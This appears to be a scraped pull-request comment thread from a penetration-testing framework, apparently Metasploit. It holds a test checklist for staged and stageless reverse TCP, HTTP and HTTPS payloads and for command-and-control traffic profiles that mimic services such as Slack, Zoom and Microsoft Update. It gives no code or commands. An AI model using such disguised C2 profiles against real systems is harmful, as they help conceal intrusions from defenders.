dledda-r7 commented Jun 9, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Test Plan

reverse tcp (stageless and staged)

stageless ✅

staged ✅

reverse http (stageless) ✅

reverse https (stageless) ✅

test at least 15 profiles

amazon.profile ✅

bing_maps ✅

bingsearch_getonly 🔴

microsoft_update ✅

mscrl ✅

msnbcvideo_getonly ✅

office365_calendar ✅

oscp ✅

reddit ✅

rtmp ✅

slack 🔴

stackoverflow ✅

trevor ✅

youtube_video ✅

zoom ✅

reverse tcp (stageless ad staged)

reverse https (stageless)

test profiles

reverse tcp (stageless ad staged)

staged ✅

stageless ✅

reverse https (stageless) ✅

profile test ✅

reverse tcp (stageless ad staged)

staged ✅

stageless ✅

reverse https (stageless) ✅

test profiles

zoom ✅

office364_calendar ✅

rtmp ✅

reverse tcp (staged)

OJ commented May 20, 2026 •

edited

Loading

dledda-r7 commented Jun 8, 2026 •

edited

Loading

dledda-r7 commented Jun 9, 2026 •

edited

Loading

dledda-r7 commented Jun 9, 2026 •

edited

Loading

dledda-r7 commented Jun 9, 2026 •

edited

Loading

dledda-r7 commented Jun 10, 2026 •

edited

Loading